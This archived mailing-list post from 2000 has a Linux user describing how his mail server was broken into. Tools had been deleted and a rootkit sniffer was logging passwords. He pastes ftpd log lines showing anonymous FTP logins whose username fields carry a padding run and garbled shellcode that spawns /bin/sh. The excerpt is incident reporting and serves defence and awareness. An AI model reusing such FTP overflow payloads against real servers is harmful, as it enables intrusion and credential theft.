Successful Intrusion into my system

Frank on Sat, 2 Sep 2000 15:53:57 +0200

[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

Successful Intrusion into my system

To: <glug@xxxxxxxxxxxx>
Subject: Successful Intrusion into my system
From: "Frank" <frank@xxxxxxxxxxxxxxxxxxxx>
Date: Sat, 2 Sep 2000 15:55:16 +0200
Cc: <postmaster@xxxxxxxxx>

Just thought you guys would want to know about a successfull hack (dunno if
you've decided wether thats the right word yet?) into my mail server.

I realised something was wrong when I could'nt find <ifconfig> or <ps>. They
had been deleted and a process called t0rns or something was running when I
reinstalled <ps>. This seemed to have been logging all usernames and
passwords in a file called something like /usr/lib/.puta/system.

On checking the log I saw the following output:-

Sep  2 05:55:46 mail ftpd[4233]: ANONYMOUS FTP LOGIN FROM
bentley.nads-sc.uiowa.edu [128.255.250.78], benjew@xxxxxxxxxxx
Sep  2 05:55:46 mail ftpd[4234]: ANONYMOUS FTP LOGIN FROM
bentley.nads-sc.uiowa.edu [128.255.250.78], benjew@xxxxxxxxxxx
Sep  2 05:55:51 mail ftpd[4237]: ANONYMOUS FTP LOGIN FROM
bentley.nads-sc.uiowa.edu [128.255.250.78], ????????????????????????????
????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????1À1Û1É°FÍ?1À1
ÛC?ÙA°?Í?ëk^1À1É?^^A?F^Df¹ÿ^A°'Í?1À?^^A°=Í?1À1Û?^
H?C^B1ÉþÉ1À?^^H°^LÍ?þÉuó1À?F^I?^^H°=Í?þ^N°0þÈ?F^D1À?F^G?v^H?F^L?ó?N^H?V^L°^K
Í?1À1Û°^AÍ?è?ÿÿÿ0bin0sh1..11
Sep  2 05:55:52 mail ftpd[4238]: ANONYMOUS FTP LOGIN FROM
bentley.nads-sc.uiowa.edu [128.255.250.78], ????????????????????????????
????????????????????????????????????????????????????????????????????????????
?????????????????????????????????????????????????
????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????
???????????????????????????????????????????????????????????????1À1Û1É°FÍ?1À1
ÛC?ÙA°?Í?ëk^1À1É?^^A?F^Df¹ÿ^A°'Í?1À?^^A°=Í?1À1Û?^
H?C^B1ÉþÉ1À?^^H°^LÍ?þÉuó1À?F^I?^^H°=Í?þ^N°0þÈ?F^D1À?F^G?v^H?F^L?ó?N^H?V^L°^K
Í?1À1Û°^AÍ?è?ÿÿÿ0bin0sh1..11
Sep  2 07:59:34 mail syslogd 1.3-3: restart.

I am at present incredibly busy and therefor am no longer subscribed to the
glug. That'le teach me to allow anonymous ftp on my server!!

Frank

Follow-Ups:
- Re: GLUG: Successful Intrusion into my system
  - From: smitty
- Re: GLUG: Successful Intrusion into my system
  - From: Neil Blakey-Milner

Prev by Date: IP Masquerading Error
Next by Date: Re: GLUG: IP Masquerading Error
Previous by thread: Re: GLUG: IP Masquerading Error
Next by thread: Re: GLUG: Successful Intrusion into my system
Index(es):
- Date
- Thread